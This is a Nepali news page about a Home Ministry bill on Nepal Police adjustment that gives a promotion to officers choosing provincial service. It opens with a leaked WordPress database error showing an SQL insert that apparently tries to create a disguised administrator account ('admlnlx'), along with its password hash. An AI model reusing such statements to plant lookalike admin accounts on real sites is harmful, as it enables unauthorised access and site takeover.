WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bt.WJx5B8pfhZVeqTZbYta0jzNfxHn0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 10:43:53', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ८ माघ, काठमाडौं । नेपाल प्रहरीको समायोजनमा प्रदेश रोज्नेलाई एक तह बढुवाको सुविधा दिने गरी नेपाल प्रहरीको समायोजन ऐन बन्ने भएको छ । गृह मन्त्रालयले प्रहरीको समायोजन विधेयक तयार गरी संसद्मा पेस गर्न स्वीकृतिका लागि मन्त्रिपरिषद् कार्यालयमा पठाएको छ ।
मन्त्रिपरिषद्को निर्णयपछि विधेयकलाई कानुनी रूप दिन अबको केही दिनभित्रै संसद् सचिवालयमा दर्ता गरिने तयारी छ । गृह मन्त्रालयका प्रवक्ता रामकृष्ण सुवेदीले नेपाल प्रहरीको समायोजन विधेयक मन्त्रिपरिषद् निर्णयका लागि प्रधानमन्त्री तथा मन्त्रिपरिषद् कार्यालयमा पेस गरिएको बताए ।
नेपाल प्रहरीसँग सम्बन्धित तीनवटा विधेयक तयार भएको छ । नेपाल प्रहरी र प्रदेश प्रहरीले सम्पादन गर्ने कार्य, सञ्चालन, सुपरीवेक्षण र समन्वयसम्बन्धी बनाएको विधेयक हो । यो समाचार आजको नयाँ पत्रिकाबाट लिएको हो ।